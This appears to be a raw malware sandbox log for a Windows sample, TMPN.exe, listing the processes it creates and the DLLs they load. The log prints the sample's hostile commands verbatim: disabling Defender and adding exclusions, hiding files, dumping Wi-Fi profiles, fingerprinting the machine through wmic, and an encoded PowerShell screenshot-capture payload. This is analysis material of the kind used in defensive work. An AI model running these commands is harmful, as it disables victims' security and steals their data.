CgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABT
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB20.tmp" "c:\Users\user\AppData\Local\Temp\0h3tdgef\CSC17976FD43C1F4C8D908DC9F141DC89D.TMP"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\Desktop\TMPN.exe	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TMPN.exe	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABT	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB20.tmp" "c:\Users\user\AppData\Local\Temp\0h3tdgef\CSC17976FD43C1F4C8D908DC9F141DC89D.TMP"

Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
